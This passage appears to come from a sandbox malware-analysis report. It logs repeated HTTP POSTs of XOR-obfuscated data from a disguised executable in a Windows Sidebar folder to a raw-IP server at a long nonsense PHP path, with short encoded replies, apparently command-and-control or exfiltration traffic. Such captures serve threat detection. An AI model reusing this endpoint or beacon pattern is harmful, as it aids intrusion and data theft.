                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:36.159135103 CET2564OUTData Raw: 50 56 5a 52 5e 5f 51 5e 5e 5e 51 57 50 58 5a 5c 59 5d 58 49 5b 53 52 5a 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PVZR^_Q^^^QWPXZ\Y]XI[SRZ[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9]>6\&? \=]/>&;)9<!7(! ?(&=%?!Y""Z)-
                                                Dec 5, 2024 16:02:37.134546995 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:37.368572950 CET207INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:36 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                12192.168.2.749779121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:02:37.605022907 CET447OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Dec 5, 2024 16:02:37.955979109 CET2564OUTData Raw: 55 55 5a 5e 5e 58 54 5a 5e 5e 51 57 50 59 5a 58 59 56 58 40 5b 54 52 5a 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: UUZ^^XTZ^^QWPYZXYVX@[TRZ[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9Y*.$/> '_+;'(%8+) "/W>3Y< '-(!Y""Z))
                                                Dec 5, 2024 16:02:38.925029039 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:39.160757065 CET151INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:38 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                13192.168.2.749781121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:02:39.405297995 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:39.752846956 CET2564OUTData Raw: 50 51 5a 59 5e 59 51 58 5e 5e 51 57 50 5d 5a 51 59 52 58 47 5b 55 52 5b 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PQZY^YQX^^QWP]ZQYRXG[UR[[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9_>?$1U#'+)>%<]*!Y+)!,+8,&>=(!Y""Z)
                                                Dec 5, 2024 16:02:40.728463888 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:40.964612007 CET207INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:40 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                14192.168.2.749786121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:02:41.197993994 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:41.549642086 CET2564OUTData Raw: 50 55 5a 5f 5b 5b 54 58 5e 5e 51 57 50 5b 5a 5b 59 52 58 40 5b 57 52 5f 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PUZ_[[TX^^QWP[Z[YRX@[WR_[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9+?10*#8X);'+5=3^!?#V*2/Z<0'.)+!Y""Z)!


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                15192.168.2.749792121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:02:42.374336004 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 1452
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:42.721857071 CET1452OUTData Raw: 50 5f 5a 52 5b 5d 54 59 5e 5e 51 57 50 5d 5a 5b 59 57 58 43 5b 57 52 51 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: P_ZR[]TY^^QWP]Z[YWXC[WRQ[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:=?>]'/2#Q;>8;?%+=;";T>7[+&==T?!Y""Z)
                                                Dec 5, 2024 16:02:43.701138020 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:43.936393023 CET380INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:43 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 06 1e 20 58 23 2e 2e 59 34 3a 34 0a 39 3d 3f 02 24 20 32 0a 32 23 09 05 32 3d 3a 0f 25 5d 2c 08 22 3b 2f 5b 21 5f 2f 16 21 3f 2b 58 33 0d 28 46 0c 1d 22 5b 24 01 2e 0e 3d 07 30 50 38 2c 22 1a 3e 33 35 01 2e 10 36 1b 3d 1d 0f 56 28 3a 3e 51 32 28 2b 01 27 3a 07 02 28 23 09 12 27 25 20 53 00 14 25 55 3d 1f 31 1f 3e 11 39 5c 36 3c 0e 1d 28 2b 0c 1d 31 38 29 0d 27 24 28 05 31 3a 38 56 23 0e 2b 1c 3e 3e 26 11 32 3c 3f 02 29 09 26 5c 21 05 20 57 00 3d 59 56
                                                Data Ascii: X#..Y4:49=?$ 22#2=:%],";/[!_/!?+X3(F"[$.=0P8,">35.6=V(:>Q2(+':(#'% S%U=1>9\6<(+18)'$(1:8V#+>>&2<?)&\! W=YV


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                16192.168.2.749793121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:02:42.496829987 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:42.846577883 CET2564OUTData Raw: 55 53 5f 58 5e 58 54 5f 5e 5e 51 57 50 53 5a 5e 59 54 58 47 5b 52 52 5e 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: US_X^XT_^^QWPSZ^YTXG[RR^[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:)>$<=Q"7)],Y((\+9$"/*"?(((]06<?!Y""Z)
                                                Dec 5, 2024 16:02:43.829968929 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:44.068679094 CET207INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:43 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                17192.168.2.749799121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:02:44.307497978 CET447OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Dec 5, 2024 16:02:44.659055948 CET2564OUTData Raw: 55 51 5f 58 5b 5f 51 59 5e 5e 51 57 50 5d 5a 5d 59 55 58 49 5b 5f 52 5c 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: UQ_X[_QY^^QWP]Z]YUXI[_R\[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9Y)?53<! 7)8+=<!?T)^(( '>9U+!Y""Z)
                                                Dec 5, 2024 16:02:45.634993076 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:45.860934019 CET151INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:45 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                18192.168.2.749804121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:02:46.104312897 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:46.456175089 CET2564OUTData Raw: 50 5f 5f 5b 5e 5e 51 5d 5e 5e 51 57 50 5d 5a 5f 59 54 58 49 5b 54 52 5f 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: P__[^^Q]^^QWP]Z_YTXI[TR_[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9^)60Y=77+*$Y<%+:4!<?W>_<<\'?/!Y""Z)
                                                Dec 5, 2024 16:02:47.428924084 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:47.668637037 CET207INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:47 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                19192.168.2.749806121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:02:47.918567896 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:48.268506050 CET2564OUTData Raw: 50 50 5f 58 5e 59 54 5a 5e 5e 51 57 50 53 5a 58 59 5d 58 41 5b 55 52 59 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PP_X^YTZ^^QWPSZXY]XA[URY[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9>>^0?% '?>;(_?5 +:$"/(!_+('=5+!Y""Z)


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                20192.168.2.749812121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:02:49.062359095 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 1452
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:49.411442995 CET1452OUTData Raw: 50 53 5f 59 5e 5c 51 5e 5e 5e 51 57 50 5d 5a 5a 59 54 58 40 5b 54 52 5c 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PS_Y^\Q^^^QWP]ZZYTX@[TR\[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9^=Y.]'/&#';*+_+68X= 6?U>+(;33.6*?!Y""Z)
                                                Dec 5, 2024 16:02:50.387979031 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:50.621937990 CET380INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:50 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 06 1e 20 10 20 3d 35 01 37 29 24 0f 2e 10 3c 10 27 1e 26 41 32 0d 33 00 25 04 3a 0f 26 38 27 1b 35 02 33 5d 22 00 2b 14 23 3c 2c 03 27 0d 28 46 0c 1d 22 13 24 28 2e 0c 2b 2a 34 57 2f 3f 21 43 28 23 08 13 2d 10 04 55 3f 20 25 57 28 3a 39 09 31 06 37 01 24 39 3a 15 29 20 24 06 26 35 20 53 00 14 25 55 29 0f 26 0e 2a 2f 25 5d 22 12 24 50 28 05 3e 5a 25 02 2e 50 26 24 09 5c 27 39 38 11 34 0e 33 1f 29 00 31 05 32 02 38 5b 3e 19 26 5c 21 05 20 57 00 3d 59 56
                                                Data Ascii: =57)$.<'&A23%:&8'53]"+#<,'(F"$(.+*4W/?!C(#-U? %W(:917$9:) $&5 S%U)&*/%]"$P(>Z%.P&$\'9843)128[>&\! W=YV


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                21192.168.2.749813121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:02:49.191667080 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:02:49.549988031 CET2564OUTData Raw: 50 52 5a 59 5b 5d 54 59 5e 5e 51 57 50 52 5a 58 59 57 58 41 5b 57 52 50 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PRZY[]TY^^QWPRZXYWXA[WRP[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9="Y$<&4*'+58X>)["<+U* <0(/!Y""Z)
                                                Dec 5, 2024 16:02:50.520759106 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:50.754431963 CET207INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:50 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                22192.168.2.749819121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:02:50.998230934 CET447OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Dec 5, 2024 16:02:51.346616030 CET2564OUTData Raw: 50 55 5f 5f 5e 51 54 5d 5e 5e 51 57 50 5e 5a 5e 59 50 58 48 5b 54 52 51 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PU__^QT]^^QWP^Z^YPXH[TRQ[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:)<!&,9P#?+(#</=;X6<*W +8\$=1(!Y""Z)5
                                                Dec 5, 2024 16:02:52.318789959 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:52.552360058 CET151INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:52 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                23192.168.2.749824121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:02:52.850572109 CET447OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2560
                                                Expect: 100-continue
                                                Dec 5, 2024 16:02:53.205964088 CET2560OUTData Raw: 55 52 5a 5c 5e 50 51 5a 5e 5e 51 57 50 5a 5a 51 59 5c 58 42 5b 52 52 5b 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: URZ\^PQZ^^QWPZZQY\XB[RR[[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9)/>&<-U7$*#>5);5<'*+($-=W?!Y""Z)
                                                Dec 5, 2024 16:02:54.170059919 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:02:54.404630899 CET151INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:02:53 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                24192.168.2.749829121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
